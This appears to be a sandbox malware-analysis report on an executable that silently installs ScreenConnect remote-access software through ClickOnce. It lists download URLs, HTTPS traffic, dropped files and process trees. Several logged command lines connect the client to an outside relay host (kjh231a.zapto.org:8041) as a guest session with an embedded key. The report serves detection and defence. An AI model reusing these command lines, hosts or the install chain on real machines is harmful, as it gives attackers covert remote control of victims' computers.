Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000620000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationn
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationt
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtv
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll
Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dllI
Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dlla
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, 5W9VLRZG.log.2.dr String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest001O3
Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifestM
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A1DA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllkU9
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe(T
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dllY
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windo
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windop
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2256114237.00000276A41AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000002.00000002.2256114237.00000276A41AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dllx
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2236254474.0000027688762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2255186285.00000276A4151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000002.00000002.2256114237.00000276A41A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe=
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exex
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsCl
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configL
Source: dfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configj
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileMa
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exX
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2AF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config~&
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeNU
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeyU
Source: svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://signup.live.com/signup.aspx
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49891 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1 Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4 Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

barindex
Source: 96r3GgxntQ.exe PE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BBA495 0_2_00BBA495
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFE7DD51B38 10_2_00007FFE7DD51B38
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FFE7DD81128 13_2_00007FFE7DD81128
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FFE7E096915 13_2_00007FFE7E096915
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
Source: 96r3GgxntQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine Classification label: mal66.evad.winEXE@18/77@2/2
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree, 0_2_00BB1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7608
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Command line argument: dfshim 0_2_00BB1000
Source: 96r3GgxntQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 96r3GgxntQ.exe ReversingLabs: Detection: 23%
Source: unknown Process created: C:\Users\user\Desktop\96r3GgxntQ.exe "C:\Users\user\Desktop\96r3GgxntQ.exe"
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
Source: unknown Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User"
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608 Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864 Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1" Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User"
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: dfshim.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
